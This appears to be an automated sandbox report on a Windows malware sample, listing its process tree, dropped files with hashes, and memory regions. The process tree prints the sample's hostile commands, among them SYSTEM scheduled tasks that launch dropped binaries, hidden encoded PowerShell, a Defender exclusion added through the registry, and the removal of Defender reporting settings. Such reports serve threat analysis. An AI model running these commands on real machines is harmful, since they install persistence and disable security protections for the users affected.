C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBfhtMwOY" /SC once /ST 04:49:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBfhtMwOY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBfhtMwOY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NDmpcgCvNfyvVRxht" /SC once /ST 13:07:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exe\" qh /MBsite_idDHs 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NDmpcgCvNfyvVRxht"2⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:321⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exeC:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exe qh /MBsite_idDHs 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bQrKcOXclPyMmQgfTY"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\icEyDogKU\UmoTAe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NplADKkCBziqQHN" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NplADKkCBziqQHN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NplADKkCBziqQHN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NplADKkCBziqQHN2" /F /xml "C:\Program Files (x86)\icEyDogKU\YofPoDw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XFllyoUkeQVbq2" /F /xml "C:\ProgramData\sUklQelueKqzsVVB\ojyTJhw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GHwlerDeIQsNdm" /F /xml "C:\Program Files (x86)\ycMZCyUlVfbU2\MaoDtKC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "asZjWRxPJGYSVOeSc2" /F /xml "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\EDNRdik.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hcGrzUAxWeRcgCYFZrx2" /F /xml "C:\Program Files (x86)\yczsUHdtPuMxC\tPBnGVj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yWyixlOEsLxsTwFTt" /SC once /ST 07:56:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\szdKxxrFMiVXCdXj\WZIgUpOi\DfqnXCV.dll\",#1 /rnsite_idLNr 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yWyixlOEsLxsTwFTt"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NDmpcgCvNfyvVRxht"2⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:321⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\WZIgUpOi\DfqnXCV.dll",#1 /rnsite_idLNr 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\szdKxxrFMiVXCdXj\WZIgUpOi\DfqnXCV.dll",#1 /rnsite_idLNr 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yWyixlOEsLxsTwFTt"3⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:321⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\EDNRdik.xmlFilesize
2KB
MD5b778cec2bfea2a4adb08e8eb7db202ec
SHA1e473837b5aa97e6e7765ebaf5a074f4661ba4b55
SHA256be2190807f8e5b5c4234ccea532a5cd8eae7eec20db7269989f0210df56b94fc
SHA51268c211cf52e62bf895dc2bc1d16dbaf19d8b17a41959d94254db272a700157b18feec63ee2eb222d8966d7759eb57cd3829dcac623ab7b86ea55cc37b7c32b0d
-
C:\Program Files (x86)\icEyDogKU\YofPoDw.xmlFilesize
2KB
MD53c89f1e6758d01d01cf5615fa3484676
SHA189f40693dc77f8f84f090cac479683dc47e1ec31
SHA256ba33112e474a0279445daa1d2012a5ea1c3a26d63d938d221cc0d8215e5ef072
SHA5125ff44ecd0b22914e7787cf2186b97cf76ba43fd307af127a5c952515c960a7c3f5cf159e9a0c09a1c4d0aa53b488c9069d3cc729add34e4bca8e40935780f5af
-
C:\Program Files (x86)\ycMZCyUlVfbU2\MaoDtKC.xmlFilesize
2KB
MD5ca3291ba3141997778c4b575dc4ba272
SHA1116f9c30b8c2bbccf6d7f4c96742754b5f44a5b6
SHA25663705616e12df6a8dcbe3f4d9ae475beef956ee4a5e5315ad74905c7108724a1
SHA51228a1a13a0905895f2f42b41a8bdc3d3d7e775459063d84e28ceedbf8595e0feff6d2ec2457334414c3ba72c366c5711bfa21f2e577696fcb27d0a79dcd32d0d3
-
C:\Program Files (x86)\yczsUHdtPuMxC\tPBnGVj.xmlFilesize
2KB
MD5b718491d2ba5428aea59a0307c3fae40
SHA1fa1a252ec164f11aff917b1d4a52ba379b51add7
SHA25677bc246264eaab43be41c4b4fffcaf5a4110c32da8ab869c7543fd700f2a169b
SHA5123ab311bc8df53989a31e443b177831a459b2a09ac124a4fd90e85bbb7d1eb2dfbbb96d4d4f4173f9c4490cbc6c47b6b0e0e41f63971812d1a47e42c592a5c8c7
-
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpiFilesize
1.4MB
MD5a437ed65abb69272c5c6b70e9ce868b6
SHA15af48cf70dbd05742e84edb7fed71527eca04ac3
SHA256c3bf1870609c93444ad72a56ed7e05807ceb86921cf87ffccd3dac1474215d58
SHA5124ad0d8f56a273dfbc514ce5509088eeab5b37a9641b2e0c12b9811422a99153be4bc68e4f13ac9fe98be273fe2d3881adb7da18a4789f9d958aa4b5e5465441c
-
C:\ProgramData\sUklQelueKqzsVVB\ojyTJhw.xmlFilesize
2KB
MD5d7cf74fbb41c99b3de62d66e3352f0c9
SHA1e838b106f3d9f1caf31e213aaae6f73895d5ca51
SHA256ee111f3cc39f8a2c7bb6fc67df7853e13a9f2da7bd6dd425dcac9904e691429e
SHA5121093aef3cfc1560dc4d720a678ed12f8fc2691beaea6cbcb4dc9a97f7a8b6b37975f8cc609f536f9993e5ea4893aad09411dd24a14cdc21dfe25e6470fe002f9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
10KB
MD5598a387e78880d74f7e440f3ab0bda26
SHA1cf653879f4c7735aed5d5f3c291bf9c66f1135a2
SHA256885525198d5e7b3fa1078dc658f094e9efc000a7a64e42a38fa3989cc8d6149f
SHA5121110b50aee7e998a9accc28ed70176417620ee19ee094324d36adc17671e04eeb250a3beee9201898152b0484d67df72bac85ef4a5d7a689b163e65b9cfde035
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
26KB
MD5eee4dbe4ccb5b0b657068aa5160a40fe
SHA1c7cfd537d3c9df90447b7f9403254669abc91c09
SHA256ff9a037b85aacb75f5d143cf5359369e3acfa2d586f72534071dcfc99bec428a
SHA512b3bf4b0ec2743deaad23a65e7f939b9fc2cddb40eb3873d998a57b2ea41e913ca3e6fcb4d16a07d5aa067dd9f76afb2b3b96439d7badac3a34e4dd7373ddbdb6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
9KB
MD5e09fe1e6ce5501aaee28aea269693d7a
SHA1ad6f4bdfc9e156786f8f3d1977af920582a6dcae
SHA256bf5e1bf2405697bc4021416f13d37ccc0c491954b7c72b25b361da1617480fe5
SHA512939da1163597496c0bed856a90c870be1b518b026d95eb39c1f9cd6fc6d4bd0d4d0f228c31cafb0db9597270fec0a81354da10ac87eac39b6bed9c798faafb6f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
C:\Users\Admin\AppData\Local\Temp\7zS22B6.tmp\Install.exeFilesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
C:\Users\Admin\AppData\Local\Temp\7zS22B6.tmp\Install.exeFilesize
6.1MB
MD5271b4c62b67f85e2dfa800a406fefd86
SHA1d0bf4731837c22399c435a93dde7416ab0255297
SHA2564000b413492854b3870c94c9f02b9d660e7ea6fbe453c3fc797835b389f974d9
SHA5123aea2ac4a77e410f25730e15da850606a1a6caea1f33a21e0b13ceb8ac8f52ce52cc497e43569d8c7a45e7b1d54bf446dbae8afcbe07ee480dc0a3d5726dbc58
-
C:\Users\Admin\AppData\Local\Temp\7zS2882.tmp\Install.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Local\Temp\7zS2882.tmp\Install.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\bKklmMU.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\bKklmMU.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ndsigrf.jbl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lsu6l7ox.default-release\prefs.jsFilesize
6KB
MD54a8c36b922262ebb126254527134440c
SHA1f8f70e15a1163719b12fafddc7b7b69c9f667ee2
SHA256a1614b9cdc647087e1fc33758a782fd464586ac447b45cd4e8ace7be434f5351
SHA51221e0b97fe41bf960d160bd816e8ddf9a46e6cd165c5afbe3dfd462db2eb84028fa5b507e847e8ecfedc066c1fe4e77b7177c50e1d44c978669b045ae82c8f249
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD539af751e26d4a21653e35a7a9bd61e0f
SHA188d086ec33a00f53e387b7fc73e49ec98b86b6ac
SHA256a9c36979892c1699abee9b5151d73aa0e72a68f61574e1dec33a6458af400aeb
SHA512886afc8261916afc109a5a8c3efcb44c424f2a9fb1c89833d3dad0ff2198c8eb14434ed2d1c02e31d5b9ecd67476ee948a29c0f433f3de67a6e35b875ede05b3
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\WZIgUpOi\DfqnXCV.dllFilesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\WZIgUpOi\DfqnXCV.dllFilesize
6.1MB
MD540f6a2cc59a1b8b2bd8e9f2d3e51e833
SHA184ada4ab4def6dd57e96c9fa70c6699bffc93eb3
SHA256c07e08ba7bf08c5f09990f2f64790c41f7b391312a51b1df56ace43d2833a6b1
SHA5123da9e9f0dd514ee71cc327ec0f0bff598b06ab150c9a84c589e20f3787a9628561f4d20467f45686f62e0a4ec7cc29d7127c61be6e0d122312750e3aca5232f7
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Windows\Temp\szdKxxrFMiVXCdXj\ftQFJCRfveHPGNc\pkscBsM.exeFilesize
6.9MB
MD56b7269665d6d4db4cb0b5982cc6decc3
SHA15bbac281f40602c98b2a12082b6de481b7c135b2
SHA25677f93eef46fc105b58eb9c463277a1381a28bf747e10686f6e296b8c96003ba8
SHA512a19e723cbe9a654d79e1f4a95a5c6c7e474746cd816438db0b98e04f20a14d2905be60938329f7c06dfe2d531f496039bfccf118a93e4ece2467f4ae49856cd0
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5bf2518c360141b3a02852671faa57dda
SHA1d2b4eed144845b37a308024c9f85388bff7ac2c9
SHA256b2799f363d2b80b6754b3f5156354b73f4fea65d97301e6e919459514773b9e3
SHA512cf91d1a6367f1a0ba415bace389d1a16bbef5833fa4614bfefc7ba41a0945a86e105a98eb67e7ce128d3444d0e3afce1fb20cc3fe6f3967053999128210871cc
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/768-40-0x0000000010000000-0x000000001057D000-memory.dmpFilesize
5.5MB
-
memory/768-105-0x0000000000980000-0x0000000001078000-memory.dmpFilesize
7.0MB
-
memory/768-39-0x0000000000980000-0x0000000001078000-memory.dmpFilesize
7.0MB
-
memory/768-87-0x0000000000980000-0x0000000001078000-memory.dmpFilesize
7.0MB
-
memory/2960-11-0x0000000000830000-0x0000000000F28000-memory.dmpFilesize
7.0MB
-
memory/2960-12-0x0000000010000000-0x000000001057D000-memory.dmpFilesize
5.5MB
-
memory/2960-529-0x0000000000830000-0x0000000000F28000-memory.dmpFilesize
7.0MB
-
memory/2960-33-0x0000000000830000-0x0000000000F28000-memory.dmpFilesize
7.0MB
-
memory/3732-44-0x00000000040F0000-0x0000000004100000-memory.dmpFilesize
64KB
-
memory/3732-48-0x0000000004E90000-0x0000000004EF6000-memory.dmpFilesize
408KB
-
memory/3732-60-0x0000000005560000-0x000000000557E000-memory.dmpFilesize
120KB
-
memory/3732-61-0x0000000005590000-0x00000000055DC000-memory.dmpFilesize
304KB
-
memory/3732-62-0x00000000040F0000-0x0000000004100000-memory.dmpFilesize
64KB
-
memory/3732-43-0x0000000072DD0000-0x0000000073580000-memory.dmpFilesize
7.7MB
-
memory/3732-45-0x0000000001C20000-0x0000000001C56000-memory.dmpFilesize
216KB
-
memory/3732-46-0x0000000004730000-0x0000000004D58000-memory.dmpFilesize
6.2MB
-
memory/3732-47-0x00000000046A0000-0x00000000046C2000-memory.dmpFilesize
136KB
-
memory/3732-65-0x0000000072DD0000-0x0000000073580000-memory.dmpFilesize
7.7MB
-
memory/3732-59-0x0000000004FE0000-0x0000000005334000-memory.dmpFilesize
3.3MB
-
memory/3732-49-0x0000000004F70000-0x0000000004FD6000-memory.dmpFilesize
408KB
-
memory/4284-100-0x00007FFF77B60000-0x00007FFF78621000-memory.dmpFilesize
10.8MB
-
memory/4284-86-0x000001F1C6EC0000-0x000001F1C6ED0000-memory.dmpFilesize
64KB
-
memory/4284-85-0x00007FFF77B60000-0x00007FFF78621000-memory.dmpFilesize
10.8MB
-
memory/4284-88-0x000001F1C6EC0000-0x000001F1C6ED0000-memory.dmpFilesize
64KB
-
memory/4312-79-0x0000000003AF0000-0x0000000003B00000-memory.dmpFilesize
64KB
-
memory/4312-80-0x0000000072DD0000-0x0000000073580000-memory.dmpFilesize
7.7MB
-
memory/4312-67-0x0000000072DD0000-0x0000000073580000-memory.dmpFilesize
7.7MB
-
memory/4380-533-0x00000000012F0000-0x000000000186D000-memory.dmpFilesize
5.5MB
-
memory/4408-17-0x00000231A60F0000-0x00000231A6100000-memory.dmpFilesize
64KB
-
memory/4408-32-0x00007FFF78100000-0x00007FFF78BC1000-memory.dmpFilesize
10.8MB
-
memory/4408-29-0x00000231A60F0000-0x00000231A6100000-memory.dmpFilesize
64KB
-
memory/4408-28-0x00000231A6100000-0x00000231A6122000-memory.dmpFilesize
136KB
-
memory/4408-16-0x00007FFF78100000-0x00007FFF78BC1000-memory.dmpFilesize
10.8MB
-
memory/4408-18-0x00000231A60F0000-0x00000231A6100000-memory.dmpFilesize
64KB
-
memory/4896-107-0x0000000010000000-0x000000001057D000-memory.dmpFilesize
5.5MB
-
memory/4896-490-0x0000000002FA0000-0x000000000301A000-memory.dmpFilesize
488KB
-
memory/4896-106-0x0000000000830000-0x0000000000F28000-memory.dmpFilesize
7.0MB
-
memory/4896-504-0x0000000003920000-0x00000000039E7000-memory.dmpFilesize
796KB
-
memory/4896-118-0x0000000001AD0000-0x0000000001B55000-memory.dmpFilesize
532KB
-
memory/4896-532-0x0000000000830000-0x0000000000F28000-memory.dmpFilesize
7.0MB
-
memory/4896-160-0x0000000002F30000-0x0000000002F9A000-memory.dmpFilesize
424KB